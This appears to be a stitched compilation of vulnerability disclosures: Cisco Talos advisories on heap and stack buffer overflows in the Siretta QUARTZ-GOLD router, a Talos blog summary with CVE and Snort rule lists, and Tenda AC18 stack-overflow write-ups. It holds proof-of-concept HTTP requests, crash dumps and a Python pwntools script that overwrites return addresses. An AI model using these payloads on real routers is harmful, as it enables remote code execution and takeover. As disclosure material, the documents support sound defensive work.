A heap-based buffer overflow vulnerability exists in the m2m DELETE_FILE cmd functionality of Siretta QUARTZ-GOLD G5.0.1.5-210720-141020. A specially-crafted network request can lead to a heap buffer overflow. An attacker can send a network request to trigger this vulnerability.

**SUMMARY**

A heap-based buffer overflow vulnerability exists in the m2m DELETE\_FILE cmd functionality of Siretta QUARTZ-GOLD G5.0.1.5-210720-141020. A specially-crafted network request can lead to a heap buffer overflow. An attacker can send a network request to trigger this vulnerability.

**CONFIRMED VULNERABLE VERSIONS**

The versions below were either tested or verified to be vulnerable by Talos or confirmed to be vulnerable by the vendor.

Siretta QUARTZ-GOLD G5.0.1.5-210720-141020

**PRODUCT URLS**

QUARTZ-GOLD - https://www.siretta.com/products/industrial-routers/4g-lte-router/gigabit-ethernet-small-footprint-lte-router-eu/

**CVSSv3 SCORE**

9.8 - CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

**CWE**

CWE-122 - Heap-based Buffer Overflow

**DETAILS**

The Siretta QUARTZ-GOLD is an industrial router with several functionalities and services, such as: SSH, UPNP, VPN, SNMP and many others.

The QUARTZ-GOLD offers a feature called M2M. When enabled, the device will execute the m2m binary and offer different network services. One of the services the m2m binary offers handles several commands. To communicate with this service the client must send a specific UDP packet format.

Following is the portion of m2m binary that manages the DELETE_FILE command:

    [...]
    cmdid_provided_LB = UDP_data_buff.cmd_id >> 8;
    if (cmdid_provided == 0x15) {
      syslog(5,"M2M Command(%02x) DELETE_FILE!!!",0x15);
      m2m_UDP_packet_resp.cmd_id._0_1_ = 0x80;
      m2m_UDP_packet_resp.cmd_id._1_1_ = cmdid_provided_LB;
      [... set base_folder variable ...]
      base_folder_length = strlen(base_folder);
      for (current_entry_off = 0; current_entry_off < (actual_data_len_recv - 0x22);
          current_entry_off = current_entry_off + __bswap_16(previous_data_len)){
        current_data_len = __bswap_16(*(UDP_data_buff.entries[0].data_len + current_entry_off));
        if ((( __bswap_16(*(UDP_data_buff.fix_word + data_idx)) != 0x12)) ||
            (((actual_data_len_recv - 0x22) - current_entry_off) < current_data_len) ||
            (command_string = calloc(current_data_len + base_folder_length + 0xc,1),
            command_string == 0x0)) {                                                                               [1]
          [... invalid state ...]
        }
        sprintf(command_string,"rm -rf %s/%s &",base_folder,&UDP_data_buff.entries[0].data + current_entry_off
               );                                                                                                   [2]
        syslog(6,"Deleting file :%s",command_string + 7);
        system(command_string);
        free(command_string);
        previous_data_len = *(UDP_data_buff.entries[0].data_len + current_entry_off);                               [3]
        [...]
    

Following whe will briefly explain the packet composition for this command:

    struct M2M_data_entry{
            uint16_t fix_word;
            uint16_t data_len;
            char data[];
    };
    
    struct M2M_packet{
            uint16_t packet_len;
            uint16_t cmd_id;
            uint32_t pkd_id;
            uint16_t version;
            M2M_data_entry entries[];
    };
    

The UDP packet received, which can contain at most 0x251c bytes, is casted to an M2M_packet. This is a variable length structure. Indeed, inside of it there is an array of M2M_data_entry structure that is a variable length struct. To seek the various entries the variable current_entry_off is used. It starts with value 0 and then, at [4], the value M2M_data_entry.data_len of the just-parsed entry is added to seek, in the next loop, the next entry.

The DELETE_FILE command will execute the command rm -rf <base_folder>/<M2M_data_entry.data> & for each entry in the UDP M2M_packet packet it received.

At [1] several checks are performed. One related to the entry size is particular interesting: (((actual_data_len_recv - 0x22) - current_entry_off) < current_data_len) where actual_data_len_recv is the total size of the UDP packet that the service received, and current_data_len is the current data entry length. Basically, this checks if the total size of the received packet minus the header (0x22 bytes) minus the current_entry_off is lower than the current_data_len. If true, the packet is invalid; otherwise a string is allocated.

The string is allocated as follow: calloc(current_data_len + base_folder_length + 0xc,1). It takes into account the base_folder length, the M2M_data_entry.data_len length of the current entry and the other characters in the format string.

The execution will reach [2] and compose the command that will then be executed. The problem is that the allocation takes into account the size provided, but then the composition of the string will use the string until the first null byte. So if the provided size is lower than the actual M2M_data_entry.data string size, a heap-based buffer overflow would occur.

**Crash Information**

    ──── registers ────
    $r0  : 0x00093ff8  →  0x41414141 ("AAAA"?)
    $r1  : 0x7ee94168  →  "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA[...]"
    $r2  : 0x14d
    $r3  : 0x41414141 ("AAAA"?)
    $r4  : 0x41414141 ("AAAA"?)
    $r5  : 0x41414141 ("AAAA"?)
    $r6  : 0x7ee932b2  →  "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA[...]"
    $r7  : 0x1000
    $r8  : 0x0
    $r9  : 0x7ee931c8  →  0x7e0000d0
    $r10 : 0xd
    $r11 : 0x0
    $r12 : 0x41414141 ("AAAA"?)
    $sp  : 0x7ee93018  →  0x7ee931c8  →  0x7e0000d0
    $lr  : 0x41414141 ("AAAA"?)
    $pc  : 0x2acb5bfc  →   stmia r0!,  {r3,  r4,  r5,  r12}
    $cpsr: [negative zero CARRY overflow interrupt fast thumb]
    ──── stack ────
    0x7ee93018│+0x0000: 0x7ee931c8  →  0x7e0000d0    ← $sp
    0x7ee9301c│+0x0004: 0x00001000
    0x7ee93020│+0x0008: 0x00093155  →  "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA[...]"
    0x7ee93024│+0x000c: 0x2acaf35c  →  <__stdio_fwrite+72> ldr r3,  [r4,  #16]
    0x7ee93028│+0x0010: 0x00001000
    0x7ee9302c│+0x0014: 0x0000000b
    0x7ee93030│+0x0018: 0x7ee932b2  →  "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA[...]"
    0x7ee93034│+0x001c: 0x00000000
    ──── code:arm:ARM ────
       0x2acb5bf0                  orr    r5,  r5,  r12,  lsl #24
       0x2acb5bf4                  lsr    r12,  r12,  #8
       0x2acb5bf8                  orr    r12,  r12,  lr,  lsl #24
     → 0x2acb5bfc                  stmia  r0!,  {r3,  r4,  r5,  r12}
       0x2acb5c00                  subs   r2,  r2,  #16
       0x2acb5c04                  bge    0x2acb5bd8
       0x2acb5c08                  pop    {r4,  r5}
       0x2acb5c0c                  adds   r2,  r2,  #12
       0x2acb5c10                  blt    0x2acb5c2c
    ──── threads ────
    [#0] Id 1, Name: "m2m", stopped 0x2acb5bfc in ?? (), reason: SIGSEGV
    ──── trace ────
    [#0] 0x2acb5bfc → stmia r0!,  {r3,  r4,  r5,  r12}
    

**TIMELINE**

2022-10-14 - Initial Vendor Contact

2022-10-20 - Vendor Disclosure

2022-11-24 - Vendor Patch Release

2023-01-26 - Public Release

Discovered by Francesco Benvenuto of Cisco Talos.

CVE-2022-41991: TALOS-2022-1639 || Cisco Talos Intelligence Group

Several stack-based buffer overflow vulnerabilities exist in the DetranCLI command parsing functionality of Siretta QUARTZ-GOLD G5.0.1.5-210720-141020. A specially-crafted network packet can lead to arbitrary command execution. An attacker can send a sequence of requests to trigger these vulnerabilities.This buffer overflow is in the function that manages the 'no wlan filter mac address WORD descript WORD' command template.

CVE-2022-41030: TALOS-2022-1613 || Cisco Talos Intelligence Group

A stack-based buffer overflow vulnerability exists in the httpd downfile.cgi functionality of Siretta QUARTZ-GOLD G5.0.1.5-210720-141020. A specially-crafted HTTP request can lead to remote code execution. An attacker can send an HTTP request to trigger this vulnerability.

**SUMMARY**

A stack-based buffer overflow vulnerability exists in the httpd downfile.cgi functionality of Siretta QUARTZ-GOLD G5.0.1.5-210720-141020. A specially-crafted HTTP request can lead to remote code execution. An attacker can send an HTTP request to trigger this vulnerability.

**CONFIRMED VULNERABLE VERSIONS**

The versions below were either tested or verified to be vulnerable by Talos or confirmed to be vulnerable by the vendor.

Siretta QUARTZ-GOLD G5.0.1.5-210720-141020

**PRODUCT URLS**

QUARTZ-GOLD - https://www.siretta.com/products/industrial-routers/4g-lte-router/gigabit-ethernet-small-footprint-lte-router-eu/

**CVSSv3 SCORE**

7.2 - CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H

**CWE**

CWE-120 - Buffer Copy without Checking Size of Input (‘Classic Buffer Overflow’)

**DETAILS**

The Siretta QUARTZ-GOLD is an industrial cellular router with several features and services, such as: SSH, UPNP, VPN, SNMP and many others.

The QUARTZ-GOLD router has a web server with several functionalities, a subset of which are related to the management of external files. Indeed, the web-server offers API for uploading files, downloading them, and also deleting if no longer required.

Following the API to download a previously uploaded file:

    void downfile.cgi(void)
    
    {
      [...]
    
      _filename_param = (char *)webcgi_safeget("_filename");                                                        [1]
      filename = "";
      if (_filename_param != (char *)0x0) {
        filename = _filename_param;
      }
      [... calculate base_folder ...]
      if (*filename != '\0') {
        sprintf(buff,"Content-Disposition:attachment;filename=\"%s\"",(char)filename);
        send_header(200,buff,"application/tomato-binary-file",0);
        sprintf(buff,"%s/%s",base_folder,filename);                                                                 [2]
        do_file(buff);                                                                                              [3]
      }
      return;
    }
    

The downfile.cgi expects one parameter called _filename that represents the filename of the desired file to be downloaded. At [1] the uploaded parameter is taken and then used at [2]. The function used at [2] is a sprintf, which does not take into consideration the size of the buffer. If the _filename parameter is longer than a certain length, the instruction at [2] would cause a stack-based buffer overflow that could led to remote code execution.

**Crash Information**

    $r0  : 0x0       
    $r1  : 0x0       
    $r2  : 0x7ef38c60  →  "/jffs/aaaabaaacaaadaaaeaaafaaagaaahaaaiaaajaaakaaa[...]"
    $r3  : 0x2000    
    $r4  : 0x61666b61 ("akfa"?)
    $r5  : 0x61676b61 ("akga"?)
    $r6  : 0x61686b61 ("akha"?)
    $r7  : 0x1       
    $r8  : 0x0       
    $r9  : 0x0001e658  →  "downfile.cgi"
    $r10 : 0x0001dbac  →  0x0001e658  →  "downfile.cgi"
    $r11 : 0x7ef3b784  →  "admin"
    $r12 : 0x2ae5573c  →  0x2ae41ac4  →  <_pthread_cleanup_pop_restore+0> push {r3,  lr}
    $sp  : 0x7ef39070  →  "akjaakkaaklaakmaaknaakoaakpaakqaakraaksaaktaak"
    $lr  : 0x2ae3bb30  →  <free+492> pop {r0,  r1,  r2,  r3,  r4,  r5,  r6,  pc}
    $pc  : 0x61696b60 ("`kia"?)
    $cpsr: [negative ZERO CARRY overflow interrupt fast THUMB]
    ─────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────── stack ────
    0x7ef39070│+0x0000: "akjaakkaaklaakmaaknaakoaakpaakqaakraaksaaktaak"     ← $sp
    0x7ef39074│+0x0004: "akkaaklaakmaaknaakoaakpaakqaakraaksaaktaak"
    0x7ef39078│+0x0008: "aklaakmaaknaakoaakpaakqaakraaksaaktaak"
    0x7ef3907c│+0x000c: "akmaaknaakoaakpaakqaakraaksaaktaak"
    0x7ef39080│+0x0010: "aknaakoaakpaakqaakraaksaaktaak"
    0x7ef39084│+0x0014: "akoaakpaakqaakraaksaaktaak"
    0x7ef39088│+0x0018: "akpaakqaakraaksaaktaak"
    0x7ef3908c│+0x001c: "akqaakraaksaaktaak"
    ────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────── code:arm:THUMB ────
    [!] Cannot disassemble from $PC
    [!] Cannot access memory at address 0x61696b60
    ───────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────── threads ────
    [#0] Id 1, Name: "httpd", stopped 0x61696b60 in ?? (), reason: SIGSEGV
    

**Exploit Proof of Concept**

Sending a request like the following:

    POST /downfile.cgi HTTP/1.1
    Authorization: Basic <a valid basic auth>
    Content-Length: 1119
    
    _filename=aaaabaaacaaadaaaeaaafaaagaaahaaaiaaajaaakaaalaaamaaanaaaoaaapaaaqaaaraaasaaataaauaaavaaawaaaxaaayaaazaabbaabcaabdaabeaabfaabgaabhaabiaabjaabkaablaabmaabnaaboaabpaabqaabraabsaabtaabuaabvaabwaabxaabyaabzaacbaaccaacdaaceaacfaacgaachaaciaacjaackaaclaacmaacnaacoaacpaacqaacraacsaactaacuaacvaacwaacxaacyaaczaadbaadcaaddaadeaadfaadgaadhaadiaadjaadkaadlaadmaadnaadoaadpaadqaadraadsaadtaaduaadvaadwaadxaadyaadzaaebaaecaaedaaeeaaefaaegaaehaaeiaaejaaekaaelaaemaaenaaeoaaepaaeqaaeraaesaaetaaeuaaevaaewaaexaaeyaaezaafbaafcaafdaafeaaffaafgaafhaafiaafjaafkaaflaafmaafnaafoaafpaafqaafraafsaaftaafuaafvaafwaafxaafyaafzaagbaagcaagdaageaagfaaggaaghaagiaagjaagkaaglaagmaagnaagoaagpaagqaagraagsaagtaaguaagvaagwaagxaagyaagzaahbaahcaahdaaheaahfaahgaahhaahiaahjaahkaahlaahmaahnaahoaahpaahqaahraahsaahtaahuaahvaahwaahxaahyaahzaaibaaicaaidaaieaaifaaigaaihaaiiaaijaaikaailaaimaainaaioaaipaaiqaairaaisaaitaaiuaaivaaiwaaixaaiyaaizaajbaajcaajdaajeaajfaajgaajhaajiaajjaajkaajlaajmaajnaajoaajpaajqaajraajsaajtaajuaajvaajwaajxaajyaajzaakbaakcaakdaakeaakfaakgaakhaakiaakjaakkaaklaakmaaknaakoaakpaakqaakraaksaaktaak&_http_id=<the correct tid>
    

The status at the return address of the downfile.cgi function would be:

    $r0  : 0x0       
    $r1  : 0x0       
    $r2  : 0x7ef38c60  →  "/jffs/aaaabaaacaaadaaaeaaafaaagaaahaaaiaaajaaakaaa[...]"
    $r3  : 0x2000    
    $r4  : 0x7ef38c60  →  "/jffs/aaaabaaacaaadaaaeaaafaaagaaahaaaiaaajaaakaaa[...]"
    $r5  : 0x00031082  →  "aaaabaaacaaadaaaeaaafaaagaaahaaaiaaajaaakaaalaaama[...]"
    $r6  : 0x0002272b  →  "/jffs"
    $r7  : 0x1       
    $r8  : 0x0       
    $r9  : 0x0001e658  →  "downfile.cgi"
    $r10 : 0x0001dbac  →  0x0001e658  →  "downfile.cgi"
    $r11 : 0x7ef3b784  →  "admin"
    $r12 : 0x2ae5573c  →  0x2ae41ac4  →  <_pthread_cleanup_pop_restore+0> push {r3,  lr}
    $sp  : 0x7ef39060  →  "akfaakgaakhaakiaakjaakkaaklaakmaaknaakoaakpaakqaak[...]"
    $lr  : 0x2ae3bb30  →  <free+492> pop {r0,  r1,  r2,  r3,  r4,  r5,  r6,  pc}
    $pc  : 0x0000f96c  →   pop {r4,  r5,  r6,  pc}
    $cpsr: [negative ZERO CARRY overflow interrupt fast thumb]
    ─────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────── stack ────
    0x7ef39060│+0x0000: "akfaakgaakhaakiaakjaakkaaklaakmaaknaakoaakpaakqaak[...]"    ← $sp
    0x7ef39064│+0x0004: "akgaakhaakiaakjaakkaaklaakmaaknaakoaakpaakqaakraak[...]"
    0x7ef39068│+0x0008: "akhaakiaakjaakkaaklaakmaaknaakoaakpaakqaakraaksaak[...]"
    0x7ef3906c│+0x000c: "akiaakjaakkaaklaakmaaknaakoaakpaakqaakraaksaaktaak"
    0x7ef39070│+0x0010: "akjaakkaaklaakmaaknaakoaakpaakqaakraaksaaktaak"
    0x7ef39074│+0x0014: "akkaaklaakmaaknaakoaakpaakqaakraaksaaktaak"
    0x7ef39078│+0x0018: "aklaakmaaknaakoaakpaakqaakraaksaaktaak"
    0x7ef3907c│+0x001c: "akmaaknaakoaakpaakqaakraaksaaktaak"
    ──────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────── code:arm:ARM ────
           0xf960                  mov    r0,  sp
           0xf964                  bl     0xbbc8
           0xf968                  add    sp,  sp,  #1024   ; 0x400
     →     0xf96c                  pop    {r4,  r5,  r6,  pc}
    [!] Cannot disassemble from $PC
    ───────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────── threads ────
    [#0] Id 1, Name: "httpd", stopped 0xf96c in ?? (), reason: BREAKPOINT
    ─────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────── trace ────
    [#0] 0xf96c → pop {r4,  r5,  r6,  pc}
    [#1] 0x2ae3bb30 → free()
    

So the next instruction will populate the pc with the fourth dword contained in the stack, so:

    gef➤  hexdump dw $sp
    0x7ef39060│+0x0000   0x61666b61   
    0x7ef39064│+0x0004   0x61676b61   
    0x7ef39068│+0x0008   0x61686b61   
    0x7ef3906c│+0x000c   0x61696b61   
    [...]
    

After the pop the pc will contain the 0x61696b61 value.

**TIMELINE**

2022-10-14 - Initial Vendor Contact

2022-10-20 - Vendor Disclosure

2022-11-24 - Vendor Patch Release

2023-01-26 - Public Release

Discovered by Francesco Benvenuto of Cisco Talos.

CVE-2022-38459: TALOS-2022-1608 || Cisco Talos Intelligence Group

A stack-based buffer overflow vulnerability exists in the httpd delfile.cgi functionality of Siretta QUARTZ-GOLD G5.0.1.5-210720-141020. A specially-crafted HTTP request can lead to remote code execution. An attacker can send an HTTP request to trigger this vulnerability.

**SUMMARY**

A stack-based buffer overflow vulnerability exists in the httpd delfile.cgi functionality of Siretta QUARTZ-GOLD G5.0.1.5-210720-141020. A specially-crafted HTTP request can lead to remote code execution. An attacker can send an HTTP request to trigger this vulnerability.

**CONFIRMED VULNERABLE VERSIONS**

The versions below were either tested or verified to be vulnerable by Talos or confirmed to be vulnerable by the vendor.

Siretta QUARTZ-GOLD G5.0.1.5-210720-141020

**PRODUCT URLS**

QUARTZ-GOLD - https://www.siretta.com/products/industrial-routers/4g-lte-router/gigabit-ethernet-small-footprint-lte-router-eu/

**CVSSv3 SCORE**

7.2 - CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H

**CWE**

CWE-120 - Buffer Copy without Checking Size of Input (‘Classic Buffer Overflow’)

**DETAILS**

The Siretta QUARTZ-GOLD is an industrial cellular router with several features and services, such as: SSH, UPNP, VPN, SNMP and many others.

The QUARTZ-GOLD router has an web server with several functionalities, a subset of which are related to the management of external files. Indeed, the web-server offers API for uploading files, downloading them, and also deleting if no longer required.

Following the API to delete a previously uploaded file:

    void delfile.cgi(void)
    
    {
      [...]
    
      [... calculate the value of the base_folder variable ...]
      _filename_param = (char *)webcgi_safeget("_filename");                                                        [1]
      filename_ = "";
      if (_filename_param != (char *)0x0) {
        filename_ = _filename_param;
      }
      if (*filename_ != '\0') {
        sprintf(command_buff,"rm -rf %s/%s",base_folder,filename_);                                                 [2]
        system(command_buff);
      }
      [...]
    }
    

The delfile.cgi expects one parameter called _filename that represents the filename of the desired file to be deleted. At [1] the uploaded parameter is taken and used at [2]. The function used at [2] is a sprintf, which does not take into consideration the size of the buffer. If the file name, provided through the _filename parameter, is longer than a certain length, the instruction at [2] would cause a stack-based buffer overflow that could lead to remote code execution.

**Crash Information**

    $r0  : 0x1       
    $r1  : 0x1       
    $r2  : 0x0       
    $r3  : 0x0       
    $r4  : 0x61616266 ("fbaa"?)
    $r5  : 0x61616366 ("fcaa"?)
    $r6  : 0x243     
    $r7  : 0x1       
    $r8  : 0x0       
    $r9  : 0x0001e66e  →  "delfile.cgi"
    $r10 : 0x0001dbdc  →  0x0001e66e  →  "delfile.cgi"
    $r11 : 0x7ea5b784  →  "admin"
    $r12 : 0x2ae4773c  →  0x2ae33ac4  →  <_pthread_cleanup_pop_restore+0> push {r3,  lr}
    $sp  : 0x7ea59070  →  "feaaffaafgaafhaafiaafjaaf"
    $lr  : 0x2ae2db30  →  <free+492> pop {r0,  r1,  r2,  r3,  r4,  r5,  r6,  pc}
    $pc  : 0x61616464 ("ddaa"?)
    $cpsr: [negative ZERO CARRY overflow interrupt fast thumb]
    ──── stack ────
    0x7ea59070│+0x0000: "feaaffaafgaafhaafiaafjaaf"  ← $sp
    0x7ea59074│+0x0004: "ffaafgaafhaafiaafjaaf"
    0x7ea59078│+0x0008: "fgaafhaafiaafjaaf"
    0x7ea5907c│+0x000c: "fhaafiaafjaaf"
    0x7ea59080│+0x0010: "fiaafjaaf"
    0x7ea59084│+0x0014: "fjaaf"
    0x7ea59088│+0x0018: 0x312f0066 ("f"?)
    0x7ea5908c│+0x001c: ".1\r\n"
    ──── code:arm:ARM ────
    [!] Cannot disassemble from $PC
    [!] Cannot access memory at address 0x61616464
    ──── threads ────
    [#0] Id 1, Name: "httpd", stopped 0x61616464 in ?? (), reason: SIGSEGV
    

**Exploit Proof of Concept**

Sending a request like the following:

    POST /delfile.cgi HTTP/1.1
    Host: 192.168.0.1
    Authorization: Basic <a valid basic auth value>
    Connection: close
    Content-Length: 579
    
    _filename=aaaabaaacaaadaaaeaaafaaagaaahaaaiaaajaaakaaalaaamaaanaaaoaaapaaaqaaaraaasaaataaauaaavaaawaaaxaaayaaazaabbaabcaabdaabeaabfaabgaabhaabiaabjaabkaablaabmaabnaaboaabpaabqaabraabsaabtaabuaabvaabwaabxaabyaabzaacbaaccaacdaaceaacfaacgaachaaciaacjaackaaclaacmaacnaacoaacpaacqaacraacsaactaacuaacvaacwaacxaacyaaczaadbaadcaaddaadeaadfaadgaadhaadiaadjaadkaadlaadmaadnaadoaadpaadqaadraadsaadtaaduaadvaadwaadxaadyaadzaaebaaecaaedaaeeaaefaaegaaehaaeiaaejaaekaaelaaemaaenaaeoaaepaaeqaaeraaesaaetaaeuaaevaaewaaexaaeyaaezaafbaafcaafdaafeaaffaafgaafhaafiaafjaaf&_http_id=<the correct tid>
    

The status at the return address of the delfile.cgi function would be:

    $r0  : 0x1       
    $r1  : 0x1       
    $r2  : 0x0       
    $r3  : 0x0       
    $r4  : 0x00019369  →  0x6e6f4300
    $r5  : 0x0002272b  →  "/jffs"
    $r6  : 0x243     
    $r7  : 0x1       
    $r8  : 0x0       
    $r9  : 0x0001e66e  →  "delfile.cgi"
    $r10 : 0x0001dbdc  →  0x0001e66e  →  "delfile.cgi"
    $r11 : 0x7ea5b784  →  "admin"
    $r12 : 0x2ae4773c  →  0x2ae33ac4  →  <_pthread_cleanup_pop_restore+0> push {r3,  lr}
    $sp  : 0x7ea59064  →  "fbaafcaafdaafeaaffaafgaafhaafiaafjaaf"
    $lr  : 0x2ae2db30  →  <free+492> pop {r0,  r1,  r2,  r3,  r4,  r5,  r6,  pc}
    $pc  : 0x0000fa48  →   pop {r4,  r5,  pc}
    $cpsr: [negative ZERO CARRY overflow interrupt fast thumb]
    ─────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────── stack ────
    0x7ea59064│+0x0000: "fbaafcaafdaafeaaffaafgaafhaafiaafjaaf"      ← $sp
    0x7ea59068│+0x0004: "fcaafdaafeaaffaafgaafhaafiaafjaaf"
    0x7ea5906c│+0x0008: "fdaafeaaffaafgaafhaafiaafjaaf"
    0x7ea59070│+0x000c: "feaaffaafgaafhaafiaafjaaf"
    0x7ea59074│+0x0010: "ffaafgaafhaafiaafjaaf"
    0x7ea59078│+0x0014: "fgaafhaafiaafjaaf"
    0x7ea5907c│+0x0018: "fhaafiaafjaaf"
    0x7ea59080│+0x001c: "fiaafjaaf"
    ──────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────── code:arm:ARM ────
           0xfa3c                  mov    r0,  r4
           0xfa40                  bl     0xbae4
           0xfa44                  add    sp,  sp,  #516    ; 0x204
     →     0xfa48                  pop    {r4,  r5,  pc}
    [!] Cannot disassemble from $PC
    ───────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────── threads ────
    [#0] Id 1, Name: "httpd", stopped 0xfa48 in ?? (), reason: BREAKPOINT
    ─────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────── trace ────
    [#0] 0xfa48 → pop {r4,  r5,  pc}
    [#1] 0x2ae2db30 → free()
    

So the next instruction will populate the pc with the third dword contained in the stack, so:

    gef➤  hexdump dword $sp
    0x7ea59064│+0x0000   0x61616266   
    0x7ea59068│+0x0004   0x61616366   
    0x7ea5906c│+0x0008   0x61616466   
    

After the pop the pc will contain the 0x61616466 value.

**TIMELINE**

2022-10-14 - Initial Vendor Contact

2022-10-20 - Vendor Disclosure

2022-11-24 - Vendor Patch Release

2023-01-26 - Public Release

Discovered by Francesco Benvenuto of Cisco Talos.

CVE-2022-36279: TALOS-2022-1605 || Cisco Talos Intelligence Group

Francesco Benvenuto of Cisco Talos discovered these vulnerabilities.
Cisco Talos recently discovered several vulnerabilities in the Siretta Quartz-Gold router. Talos also discovered vulnerabilities in FreshTomato while investigating the Siretta router.
The Siretta Quartz-Gold is an industrial cellular router with several features and services, such as: SSH, UPNP, VPN, SNMP and

Thursday, January 26, 2023 16:01

_Francesco Benvenuto of Cisco Talos discovered these vulnerabilities._

Cisco Talos recently discovered several vulnerabilities in the Siretta Quartz-Gold router. Talos also discovered vulnerabilities in FreshTomato while investigating the Siretta router.

The Siretta Quartz-Gold is an industrial cellular router with several features and services, such as: SSH, UPNP, VPN, SNMP and many others. FreshTomato is an open source firmware based on Linux. The firmware offers several features for Broadcom-based routers.

**Quartz-Gold Vulnerabilities**

Several OS command injection vulnerabilities were found which could lead to arbitrary command execution, making them all high risk. TALOS-2022-1607 (CVE-2022-40969) and TALOS-2022-1612 (CVE-2022-40220) can be triggered with HTTP requests, while TALOS-2022-1615 (CVE-2022-38066), TALOS-2022-1638 (CVE-2022-40222) and TALOS-2022-1640 (CVE-2022-42490-CVE-2022-42493) can each be triggered with a network request.

Three directory traversals were recorded in QUARTZ-GOLD, TALOS-2022-1606 (CVE-2022-40701) and TALOS-2022-1637 (CVE-2022-41154), which can lead to arbitrary file deletion. Advisory 1637 has a higher CVSS risk rating and can be triggered by a network request. TALOS-2022-1609 (CVE-2022-38088) can lead to arbitrary file read.

Three stack-based buffer overflows were found: TALOS-2022-1605 (CVE-2022-36279) and TALOS-2022-1608 (CVE-2022-38459) can lead to remote code execution, triggered by an HTTP request. TALOS-2022-1613 (CVE-2022-40985-CVE-2022-41030) can lead to arbitrary command execution and is triggered by a sequence of requests.

A heap-based buffer overflow vulnerability was also reported in TALOS-2022-1639 (CVE-2022-41991), which can be triggered by a network request.

Two other vulnerabilities were discovered, including TALOS-2022-1610 (CVE-2022-38715), a leftover debug code that can lead to remote code execution, and TALOS-2022-1611 (CVE-2022-39045), a file write vulnerability that can lead to arbitrary file upload. Both can be triggered by HTTP requests.

**FreshTomato Vulnerabilities**

In FreshTomato, there is TALOS-2022-1641 (CVE-2022-42484), an OS command injection vulnerability and a directory traversal vulnerability, TALOS-2022-1642 (CVE-2022-38451). An attacker can send an HTTP request to trigger these vulnerabilities.

Cisco Talos worked with Siretta and FreshTomato to ensure that these issues were resolved and an update is available for affected customers, all in adherence to Cisco’s vulnerability disclosure policy.

Users are encouraged to update these affected products as soon as possible: Siretta QUARTZ-GOLD G5.0.1.5-210720-141020, FreshTomato 2022.5, Siretta QUARTZ-GOLD G5.0.1.5-210720-141020, AdvancedTomato commit 67273b0. Talos tested and confirmed these versions of Siretta and FreshTomato could be exploited by these vulnerabilities.

The following Snort rules will detect exploitation attempts against this vulnerability: 60649-60652, 60656-0664, 60667, 60692, 60721-60724, 60761-60763, 60771-60775, 60846-60847, 60914. Additional rules may be released in the future and current rules are subject to change, pending additional vulnerability information. For the most current rule information, please refer to your Firepower Management Center or Snort.org.

Vulnerability Spotlight: OS command injection, directory traversal and other vulnerabilities found in Siretta Quartz-Gold and FreshTomato

Tenda AC18 V15.03.05.19 is vulnerable to Buffer Overflow via /goform/formWifiBasicSet.

****CVE-2023-24166****

Tenda AC18 Unauthorized stack overflow vulnerability

****1\. Affected version:****

Tenda ac18\_kf\_V15.03.05.19(6318\_)\_cn

****2\. Firmware download address****

https://www.tenda.com.cn/download/detail-2683.html

****3\. Vulnerability details****

The function "formWifiBasicSet" contains a stack-based buffer overflow vulnerability. In the function, it reads in a user-provided parameter, and the variable is passed to the function without any length check, which may lead to overflow of the stack-based buffer. As a result, by requesting the page, an attacker can easily execute a denial of service attack or remote code execution with carefully crafted overflow data.

****4\. Recurring vulnerabilities and POC****

import requests
from pwn import \*

url \= 'http://x.x.x.x/goform/WifiBasicSet'
pl \= 'a'\*564+p32(0xdeadbeef)
data \= {'security\_5g':pl, 'hideSsid':'1', 'ssid':'1', 'security':'1', 'wrlPwd':'1', 'hideSsid\_5g':'1', 'ssid\_5g':'1', 'wrlPwd\_5g': '1'}

requests.post(url, data\=data)

**5\. Author**

Drizzling\_Sun @KRlab

CVE-2023-24166: Tenda/2.md at main · DrizzlingSun/Tenda

Tenda AC18 V15.03.05.19 is vulnerable to Buffer Overflow via /goform/FUN_000c2318.

****CVE-2023-24164****

Tenda AC18 Unauthorized stack overflow vulnerability

****1\. Affected version:****

Tenda ac18\_kf\_V15.03.05.19(6318\_)\_cn

****2\. Firmware download address****

https://www.tenda.com.cn/download/detail-2683.html

****3\. Vulnerability details****

The function "FUN\_000c2318" contains a stack-based buffer overflow vulnerability. In the function, it reads in a user-provided parameter, and the variable is passed to the function without any length check, which may lead to overflow of the stack-based buffer. As a result, by requesting the page, an attacker can easily execute a denial of service attack or remote code execution with carefully crafted overflow data.

****4\. Recurring vulnerabilities and POC****

Due to legal and policy reasons, we are unable to provide the exploit for this vulnerability at this time.

**5\. Author**

Drizzling\_Sun @KRlab

CVE-2023-24164: Tenda/4.md at main · DrizzlingSun/Tenda

Tenda AC18 V15.03.05.19 is vulnerable to Buffer Overflow via /goform/initIpAddrInfo.

****CVE-2023-24165****

Tenda AC18 Unauthorized stack overflow vulnerability

****1\. Affected version:****

Tenda ac18\_kf\_V15.03.05.19(6318\_)\_cn

****2\. Firmware download address****

AC18升级软件\_腾达(Tenda)官方网站

****3\. Vulnerability details****

